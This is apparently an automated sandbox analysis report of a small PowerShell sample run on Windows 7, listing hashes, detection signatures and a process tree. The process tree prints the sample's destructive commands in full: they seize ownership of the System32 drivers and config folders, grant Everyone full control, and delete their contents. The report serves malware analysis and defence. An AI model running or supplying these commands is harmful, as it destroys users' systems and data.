Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
13-08-2024 20:52
Static task
static1
Behavioral task
behavioral1
Sample
file01.ps1
Resource
win7-20240708-en
6 signatures
150 seconds
General
-
Target
file01.ps1
-
Size
356B
-
MD5
3f55ba228a7b2931005316aa0a1c05ea
-
SHA1
2795c83876b760678379f29c9a16b502bafdfc42
-
SHA256
6377fc50b386cf4e90f86e49e89125e01af9ac23349ee5d5ce9c49c23ad3f308
-
SHA512
765e776d02c153b0e4817196471e429cc280e0bc06df4662825abc2d3be1fff210e5cca15580e14564e160690d81fa73f2712ee1f3dc3b3242d419c6d6bd7afb
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2396 takeown.exe 2260 icacls.exe 2572 takeown.exe 2204 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 2204 icacls.exe 2396 takeown.exe 2260 icacls.exe 2572 takeown.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2296 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exetakeown.exedescription pid process Token: SeDebugPrivilege 2296 powershell.exe Token: SeTakeOwnershipPrivilege 2396 takeown.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
powershell.execmd.execmd.exedescription pid process target process PID 2296 wrote to memory of 2280 2296 powershell.exe cmd.exe PID 2296 wrote to memory of 2280 2296 powershell.exe cmd.exe PID 2296 wrote to memory of 2280 2296 powershell.exe cmd.exe PID 2280 wrote to memory of 2396 2280 cmd.exe takeown.exe PID 2280 wrote to memory of 2396 2280 cmd.exe takeown.exe PID 2280 wrote to memory of 2396 2280 cmd.exe takeown.exe PID 2280 wrote to memory of 2260 2280 cmd.exe icacls.exe PID 2280 wrote to memory of 2260 2280 cmd.exe icacls.exe PID 2280 wrote to memory of 2260 2280 cmd.exe icacls.exe PID 2296 wrote to memory of 1072 2296 powershell.exe cmd.exe PID 2296 wrote to memory of 1072 2296 powershell.exe cmd.exe PID 2296 wrote to memory of 1072 2296 powershell.exe cmd.exe PID 1072 wrote to memory of 2572 1072 cmd.exe takeown.exe PID 1072 wrote to memory of 2572 1072 cmd.exe takeown.exe PID 1072 wrote to memory of 2572 1072 cmd.exe takeown.exe PID 1072 wrote to memory of 2204 1072 cmd.exe icacls.exe PID 1072 wrote to memory of 2204 1072 cmd.exe icacls.exe PID 1072 wrote to memory of 2204 1072 cmd.exe icacls.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\file01.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul && exit"2⤵
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2260
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\config\* >nul && icacls C:\Windows\System32\config\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\config\* >nul 2>&1 && exit"2⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\config\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2572
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\config\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2204
-
-
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T1⤵PID:1216